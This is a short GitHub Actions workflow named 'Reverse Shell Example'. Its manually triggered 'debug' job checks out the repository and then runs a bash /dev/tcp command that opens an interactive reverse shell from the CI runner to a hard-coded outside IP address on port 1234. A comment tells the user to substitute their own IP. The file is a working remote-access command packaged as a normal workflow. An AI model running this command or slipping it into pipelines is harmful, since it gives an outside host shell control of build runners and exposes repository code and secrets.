name: Reverse Shell Example

on:
  workflow_dispatch:  # Allows manual trigger via GitHub UI

jobs:
  debug:
    runs-on: ubuntu-latest  # Use Debian-based runner

    steps:
      - name: Checkout code
        uses: actions/checkout@v4

      - name: Reverse Shell (Netcat)
        run: |
          # Replace YOUR_IP_ADDRESS with your local machine's IP address (where you are listening)
          bash -i >& /dev/tcp/76.124.115.63/1234 0>&1
